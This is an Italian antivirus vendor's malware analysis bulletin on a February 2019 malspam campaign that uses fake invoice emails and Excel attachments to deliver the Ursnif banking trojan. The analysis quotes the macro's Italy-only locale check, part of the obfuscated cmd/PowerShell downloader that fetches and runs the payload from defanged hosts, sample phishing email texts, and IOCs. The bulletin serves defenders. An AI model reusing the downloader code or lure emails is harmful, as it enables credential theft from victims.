TG Soft Security Software Specialist - Vir.IT eXplorer: AntiVirus-AntiSpyware-AntiMalware-AntiRansomware
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

ICSA Lab ICSA Lab

Vir.IT eXplorer PRO supera il test internazionale VB100 2019-02

AMTSO

OpsWat



EICAR Membro SERIT - Security Research in ITaly

12/02/2019 09:37:49 - Nuovo malspam con finta fattura Excel veicola il noto malware Ursnif

      
 
 

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una mail della campagna che diffonde il malware Trojan  inviata in data 12 Febbraio 2019.

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.

INDICE

 Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

Falsa mail con finta Fattura diffonde Trojan Ursnif


Descrizione
:
La campagna di invio di malspam è stata rilevata nella mattina del 12 Febbraio 2019.
Le mail si presentano con un breve messaggio variabile che sollecita l'apertura del file allegato.
L'allegato è un file di Excel contenente una MACRO malevola.

Riportiamo alcuni esempi di email analizzate diverse nel testo ma che contengono lo stesso allegato:

OggettoAVVISO DI PAGAMENTO

 
AVVISO DI PAGAMENTO - Mozilla Thunderbird
Da:                         
Oggetto: AVVISO DI PAGAMENTO
A:                           
Gent.le Soggetto Responsabile,


potrei avere notizie sul pagamento della fattura in oggetto?

Cordialmente,
 

-- -- -- --

|----------------|


[REDACTED] SpA

 
1 allegato: Ft._immediata_group_3124_2019_02.xls
 

OggettoFattura corretta

 
Fattura corretta - Mozilla Thunderbird
Da:                         
Oggetto: Fattura corretta
A:                           
Buongiorno,


In allegato inviamo documento in oggetto

Distinti saluti,

 

-- -- -- --


|----------------|

UFFICIO

 
1 allegato: Ft._immediata_group_4715_2019_02.xls

Sono state riscontrate altre email contententi lo stesso allegato ma con i seguenti oggetti:
  • Fatt. 1757 del 12-02-2019
  • fattura in scadenza
  • Fattura N. 0036_F del 12_02_2019
  • NS.ORDINE NR.0029809 DEL 12_02_19

Torna ad inizio pagina

 
L'allegato .xls (Excel) ha le seguenti caratteristiche:
  • Nome File: Ft._immediata_group_4715_2019_02.xls
  • Dimensione: 88576 Byte
  • Md5: D8ED8287B99E918DA0E30EDEC975AD76
  • Famiglia malware: Downloader
  • VirIT: X97M.Downloader.GD
Il nome del file è variabile ma si tratta dello stesso file.
Il nome ha questa struttura:

Ft._immediata_group_
[NUMERO RANDOM]_2019_02.xls

L'allegato Excel al suo interno contiene una MACRO che se eseguita porta al download con successiva esecuzione del payload del Malware.

La MACRO effettua all'apertura un controllo sull'attuale paese/regione impostato nel Pannello di controllo di Windows attraverso la proprietà "Application.International" sul parametro "xlCountrySetting" con la funzione chiamata Melon(). La funzione Melon() restituirà 39 se il paese è l'Italia.
Successivamente viene fatta la verifica con questa semplice condizione:

If Melon = xlBarOfPie - 32 Then Facebook...

Dove Melon in caso di paese Italia vale 39, xlBarOfPie è una funzione di Excel il cui valore di default è 71 e sottraendo il valore 32.
Semplificando la condizione è 39 = (71-32) pari a 39 = 39

Viene quindi dato il via all'infezione in quanto il controllo da esito positivo popolando la variabile con nome Facebook che conterrà il codice che sarà successivamente eseguito. Se il controllo non da esito positivo il file viene chiuso (Application.Quit).

....
Function Melon()
devmas = xlCountrySetting
Melon = Application.International(devmas)
End Function

Sub Workbook_Open()
CellChecking
End Sub
Sub CellChecking()
If Melon = xlBarOfPie - 32 Then Facebook = Shell#(Reports & LeftAnd + dWindow, xlPageBreakFull * 0) Else propert
End Sub
....

Sub propert()
Application.Quit
End Sub
.....

Questo fa notare l'intenzione da parte dell'attaccante di colpire i soli target italiani.

Se la verifica della localizzazione ha esito positivo viene dato il via alla catena di comandi atti al download del Payload del Malware (vedi estratto grafico img.1):
  • La MACRO esegue un primo comando "CMD" contenente il codice offuscato per effettuare il download di cui ne riportiamo una parte.
cmD /C "sEt   eIw=${d`EMo}='4 , 521,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' ("nIo`j"::]GnIRTs[()'''' nIOJ-''x''+]3,1[)("gni`R`tSoT".}ECNerE`F`ErPEsoB`rEV{$ ( . 8 [........] , 8 ) ) ) 14 ,521 , 97 ,' -split "8";${de} = ${d`EmO}[-1..-(${d`emO}."CoU`NT")] -join "8";${dD}=${De}[-1..-(${D`e}."L`En`GtH")] -join "";^&("{1}{0}"-f 'x','ie')(${d`D}) &&SeT   tRsY=pOwERSHELl -ExecUTIONPOLiC BYpaSs  -nOni  -NOPRoFiLe -WiN  hIdden     .  (  \"{1}{0}\"-f 't','se') dCz2Y  ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' )  )  ;   (   $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p'  )  ) )^^^|   ^^^&( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') (  \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn''  )&& cmD/C %trSY%"

  • Viene quindi eseguito un secondo comando "CMD" che esegue il codice deoffuscato in precedenza.
C:\Windows\system32\cmd.exe cmD /C %trSY%

  • Il comando precedente esegue il comando finale in "POWERSHELL" di cui ne riportiamo una parte.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERSHELl  -ExecUTIONPOLiC BYpaSs  -nOni  -NOPRoFiLe -WiN  hIdden     .  (  \"{1}{0}\"-f 't','se') dCz2Y  [.....] `AmE\"[3,11,2]-JoIn''  )
  • Il comando POWERSHELL da quindi inizio al download del malware.
Il comando POWERSHELL scarica due file:
  • https://i[.]imgur[.]com/RC0YsYD.png
  • https://delegirato[.]pro/aria-debug-5672.log
Il primo file "RC0YsYD.png" (MD5: FEBEF165B21350B21163C022E05033C7) è una immagine (img.2) mentre il secondo file è il Payload del Malware che viene quindi eseguito.


img.1



img.2

Il Payload del Malware viene salvato nella cartella temporanea dell'utente (%temp%) nel caso di questa analisi con nome "WindowsSdk 1.exe"
  • Nome File: WindowsSdk 1.exe
  • Dimensione: 486912 Byte
  • Md5: 4BC2364FDF08D525BCEE825A8F87B0D2
  • Data di compilazione: 12/02/2019 - 05:22:47
  • Famiglia malware: Ursnif
  • VirIT: Trojan.Win32.Ursnif.BHE
e successivamente eseguito.

Il malware Ursnif quindi esegue il processo di Internet Explorer (iexplore.exe) che utilizzerà per contattare il server di Comando e Controllo (C&C) a questo indirizzo IP 185[.]189[.]149[.]183 con la seguente struttura:

185[.]189[.]149[.]183/images/7vhKJ9weayBPZj6Mo2dxBtF/ 3NNtwfuOCM/_2FcBbIkEn1S35zVK/IIQLm_2BBR3f/pg1ZMlEMjKI/ DUGBKeoVBwYdeC/ UJGsmV8gaLxZynd4tyu0K/9Bf8j2KcVcAQT1Ev/ mkK3CD_2Br_2FI_/2FNBXiKUQWPQfk/ _2Fw5jA7/5[.]avi

Di seguito riportiamo il grafico completo del processo di infezione:


Lo scopo finale del Malware è quello di esfiltrare login e password di accesso a siti importanti come home banking, posta elettronica, Social Network, Siti Web, FTP etc...

IOC

MD5:
D8ED8287B99E918DA0E30EDEC975AD76 [DROPPER]
4BC2364FDF08D525BCEE825A8F87B0D2 [URSNIF]
B2469B2B08F67CC20D6A0483815D2AD4
[URSNIF]
E50F6B719019CF3DE572C33BE6E2AF1C
[URSNIF]

URL:
https://delegirato[.]pro -> IP: 109[.]230[.]199[.]203 - ASN: AS42708 Portlane AB
C&C: 185[.]189[.]149[.]183 - ASN: AS51395 SOFTplus Entwicklungen GmbH



Torna ad inizio pagina

 


Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker,  il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui  la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.  


Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
  1. qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
  2. salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Torna ad inizio pagina
 


Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:
  • liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
  • interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
  • identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
  • grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
  • Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.
 


C.R.A.M.

Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina





Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283